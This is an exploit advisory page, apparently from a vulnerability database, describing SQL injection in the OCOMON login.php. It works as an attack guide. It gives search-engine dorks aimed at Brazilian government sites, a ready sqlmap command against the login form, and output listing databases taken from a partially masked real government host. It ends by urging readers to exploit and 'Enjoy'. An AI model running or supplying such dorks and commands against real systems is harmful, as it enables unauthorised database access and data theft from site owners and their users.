OCOMON Sql Injection Via POST

2016.11.12
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

~ OCOMON Sql Injection Vulnerable: ~ %[JonatasFil DKR]% - OCOMON are vulnerable to Bypass Sqli, {https://cxsecurity.com/issue/WLB-2016080175} - And recently discovered a method of doing sqli injection via post using sqlmap. ------------------------------------------------------ [+] Vuln Directory: /ocomon/includes/common/login.php ------------------------------------------------------ - Ok, First you have to find out if the site has the file login.php and it is vuln. ------------------------------------------------------------------------------------ [+] Dork:inurl:"ocomon" site:gov.br [+] Dork:inurl:"ocomon" site:br ----------------------------------------------------- - After finding a site with the system vulnerable: ----------------------- [+] Download Sqlmap: [+] http://sqlmap.org/ ----------------------- - and go exploit. ------------------------------------------------------------------------------------ [XPL] "sqlmap -u http://www.{site}/ocomon/includes/common/login.php --data"=login=" --dbs --random-agent" ------------------------------------------------------------------------------------- - After that just list the tables. ------------------------- available databases [7]: [*] emater [*] forum [*] information_schema [*] mysql [*] ocomon_rc6 [*] phpmyadmin [*] wordpress --------------------------- [+] DEMO: wwXw.emaXter.pXa.goXv.bXr ~ Enjoy :D

References:

https://cxsecurity.com/issue/WLB-2016080175


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top